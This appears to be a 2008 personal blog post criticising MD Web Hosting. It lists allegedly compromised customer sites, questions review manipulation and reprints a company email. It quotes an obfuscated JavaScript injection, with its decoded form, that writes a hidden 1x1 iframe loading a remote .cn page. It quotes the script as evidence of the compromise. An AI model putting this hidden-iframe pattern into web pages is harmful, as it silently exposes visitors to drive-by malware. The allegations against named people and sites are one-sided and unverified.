Seems someone at MD Web Hosting is reading here and removed the offending code on instrumentsolutions.com.au or possibly Brad did it either way its been removed. So I did a little research on the actual server and found the following compromised websites. I wonder what the rate of compromised websites is on other Hosting companies is? Out of the 40 odd websites I checked (I did not check all websites) on MD Web Hosting server the following websites were found.  14 out of 40 or so must make you wonder. I am sure once they read this they willremove the offending code. There was three main infections that I found. Luckily archive.org and google have long memories soif they shout I am lying I have the proof to backit up.

• How do they allow so many sites to exist on their servers compromised?
• How did these sites get compromised in the first place?
• If you are considering MD Web Hosting as a HOST maybe ask for the IP first and do a check to see how many infected websites are on the same server.

I would suggest that unless you know what your doing you don’t visit these websites as your system could be infected with various malicious scripts and programs.

http://www.pfsgroup.com.au/

http://exactelectrical.com/

http://equinoxsolar.com.au/

http://fentez.com/

http://gold-corporate.com/

http://generia.com/

http://greenamenities.com/

http://ita.vic.edu.au/

http://nkinjectionmoulding.com/

http://mtcfvic.org/

http://naaschoice.com/

http://teamvisualvision.com/

http://vitalhealthgenics.com/ hacked not 1 but 2

http://www.annalisapansini.com/ several injections

Hmmm after a little bit more checking it looks like Brad and his website was the host of some rather curious pages I wonder if he even knew about them?

http://web.archive.org/web/*/instrumentsolutions.com.au/*

Check out the spammy pages. When I did a bit of a google search for those pages they were spammed out like crazy. Who ever got access to their site had posted spam on their site and then proceeded to gain 100′s of spammy links to those pages

Google Results

Going through the logs I see some unusual stuff so while I am checking that out I find that http://www.webhostingstuff.com/review/MDWebHosting.html has had a few updates to its Reviews now all these reviews are in a close nit of time 1 on the 3rd December 2008, 2 on the 4th December 2008, 1 on the 9th December 2008, and finally 1 on the 12th December (now this looks suss to me but who am I to argue) all these kind soles may have felt the need to put in positive reviews all at the same time. I don’t own the site and don’t have access to the ip logs so I am sure the owners of webhostingstuff looked into it and saw they were legit?

Anyways back to my story. The post on the 12th of December was from Brad (instrumentsolutions.com.au) now as far as I can tell (and I could be wrong) Brad is a Director, designer and technical support for the domain and business. He gives MD Web Hosting a glowing report 5 stars for Overall Rating, Uptime & Reliability, Technical Support and Customer Service. He must be very happy with MD Web Hosting.

Now you must be saying “SO WHAT” well the interesting thing is I wonder who injected malicious code into their domain was it

• someone hacked their site? are they using a sloppy script?
  
• brad put it in there for some reason? why would you?
  
• or did someone hack MD Web Hosting server and inject the code?

Now I am not sure who put it in there luckily the infection has been neutralised. I am sure from past interactions with MD that they will blame Brad for this problem.

The offending code has be obscufated

script type="text/javascript">!--
document.write(unescape('%3c%69%
66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%68%6f
%73%74%69%6e%67%6d%64%2e%63%6e%2f%73%2f%6f%75%74%2e%70%68%70
%3f%73%5f%69%64%3d%31%22%20%77%69%64%74%68%3d%31%20%68%65%69
%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c
%69%74%79%3a%20%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d
%65%3e'))
// -->


Which in turns produces this iframe

script type="text/javascript">!--
document.write(unescape('iframe src="
http://hostingmd.cn/s/out.php?s_id=1" mce_src="
http://hostingmd.cn/s/out.php?s_id=1"
width=1 height=1 style="visibility: hidden" mce_style="visibility: hidden">
/iframe>'))
// -->


I wonder should I send an email is it worth it?

I was reading Whirlpool again (A great source of embarresment for MD Web Hosting) and one of their clients who said he was from Hong Kong said he couldn’t contact them, as they had lost their phone numbers. (Knowing how well they treat their online help) he put a message up on Whirlpool asking for help in contacting them.Much to my surprise MD Web Hosting’s representative tomn on whirlpool asked him to whim him in a fairly quick time. Another  user decided to give him some phone numbers (which had been disconnected) tomn’s reply was that those numbers no longer belonged to MD Web Hosting and that the only number to use was their 1300 number. Now not sure if tomn  knows this but 1300 numbers are only accesible inside Australia and seeing the guy was from Hong Kong then thats a problem. With all luck he is their only customer from outside Australia and will be the only person affected by this but my guess from the searches people are landing on this site about contact numbers for MD Web Hosting he is not the only person that can’t get in touch. Here is the thread in mention.

According to waitingtoconnect (#190534) a user on whirlpool MD Web Hosting had another problem with their mySQL database. But of course if you check out tomn reply thats not an admission that anything is wrong http://forums.whirlpool.net.au/forum-replies.cfm?t=1114370

I was looking for the error log for this server and to my surprise there isn’t one yet. So for 10 days it has been online and up. Quite a feat compared to the error log from MD Web Hosting.

Sometime around the 18th of November someone claiming to be from MD Web Hosting gave me a call telling me that if I didn’t remove this site they would sue me. I asked what they were goingto sue me for but he could not tell me. I haven’t heard any more about it. They have my address so they could send me a summons if they wanted to. I will let you know more if I hear more from them.

I asked my lawyer what they could sue for and really there isn’t much so I am not worried. They would have to prove some of the stuff I was saying on here is false but I have all the logs to prove what I say and if they deleted their logs I am sure the judge would love that.

You might ask why am I doing this site, what do I want, well as you can tell from the site I have no advertising on it. So what do I actually want. Nothing. I don’t want money from MD Web Hosting, I don’t want them to refund my account, I don’t want them to purchase this domain from me, I don’t want them to pay me off to get rid of this site. I don’t even want to hear from them again.

I am not in any direct competition with MD Web Hosting. I do not offer affiliates with any other hosting company and I do not work for any other hosting company.

I don’t even want people to not use MD Web Hosting I am sure that some one out their must have had good service from them otherwise how could they stay in business and expand (as they have mentioned).

All I am telling you about is my experience with them and I have proof of everything that I say. If it helps you make an informed decision then I am glad. If you choose to believe that I have ulterior motives behind this site there is probably nothing I can do to convince you otherwise.

The cost of this site is minimal for me as I have several web servers and in previous posts I mention I was trialling MD Web Hosting to see if I could get better service at a cheaper price. So about the only payment I need to make is the cost of the domain which is around $9.00 US.

A couple of people who have had the same problems or similar problems with MD Web Hosting have left comments which I have put up un edited (except for time stamps because I didn’t get a chance to back up the domain before it was cancelled on me) I have even allowed a post un edited from Mark Galea allegedely (I have no proof apart from ip adress that it is him) and I will post any comments deemed not profanity or spam to be posted un edited.

I was going to let this domain die a natural death when my account was due for expiration on the 25th November 2008, when I received the following email on the 18th November 2008,

Hello Tony,

We are sending you this email to inform you of the termination of your account for the domain prematurely due to the domain hosted as an add-on domain mdwebhostingsucks.com. We would appreciate you discontinue the use of the domain as it has damaged our company reputation.

We do realise you have suffered a variety of issues whilst hosting through our company which arose when we had a major outage earlier in the year. If you believe you have not been provided the service you paid for we urge you to voice any issues to our customer service team or management rather than voicing your point of view over the internet.

We are very willing to resolve any issues you have with MD Web Hosting and I personally would like to speak to you regarding them at your earliest convenience.

Thank you,

Mark Galea

MD Web Hosting Pty Ltd – Operations

w: www.mdwebhosting.com.au

e: markg@mdwebhosting.com.au

t:  1300 734 660 f:  1300 659 100

This is a bit of old news and I have seen various other mentions of MD being hacked but here is the full version as written by Australia IT News which is a part of The Australian newspaper.

http://www.australianit.news.com.au/story/0,24897,22953634-15306,00.html